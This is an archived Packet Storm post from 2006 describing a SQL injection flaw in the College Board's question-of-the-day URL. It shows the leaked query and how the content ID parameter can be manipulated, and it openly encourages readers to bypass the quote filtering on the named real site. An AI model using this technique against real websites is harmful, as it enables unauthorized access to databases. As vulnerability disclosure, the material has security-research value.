Lucene search
K

satcollege.txt

🗓️ 27 Aug 2006 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

sat collegeboard SQL injection vulnerability with query exampl

Code
`sat collegeboard site sql injection vulnerability  
  
they even show you the query to be nice  
  
to get your question of the day:  
http://www.collegeboard.com/apps/qotd/question/0,,47992,00.html  
  
<!--  
SELECT s.question, ls.name, ls.description, s.content_id, s.hint  
FROM survey s, lk_survey ls  
WHERE s.lk_survey_id = ls.lk_survey_id  
AND s.content_id = 47992  
-->  
  
and the s.content_id is directly controllable  
  
http://www.collegeboard.com/apps/qotd/question/0,,(47992),00.html  
<!--  
SELECT s.question, ls.name, ls.description, s.content_id, s.hint  
FROM survey s, lk_survey ls  
WHERE s.lk_survey_id = ls.lk_survey_id  
AND s.content_id = (47992)  
-->  
  
  
they do some naive filtering of quotes but you'll quickly find the bypass have PHUN and teachers live those kids alone  
***************************************************************  
This email was send via www.AnonymousSpeech.com,   
the worlds leading anonymous email provider.  
***************************************************************  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation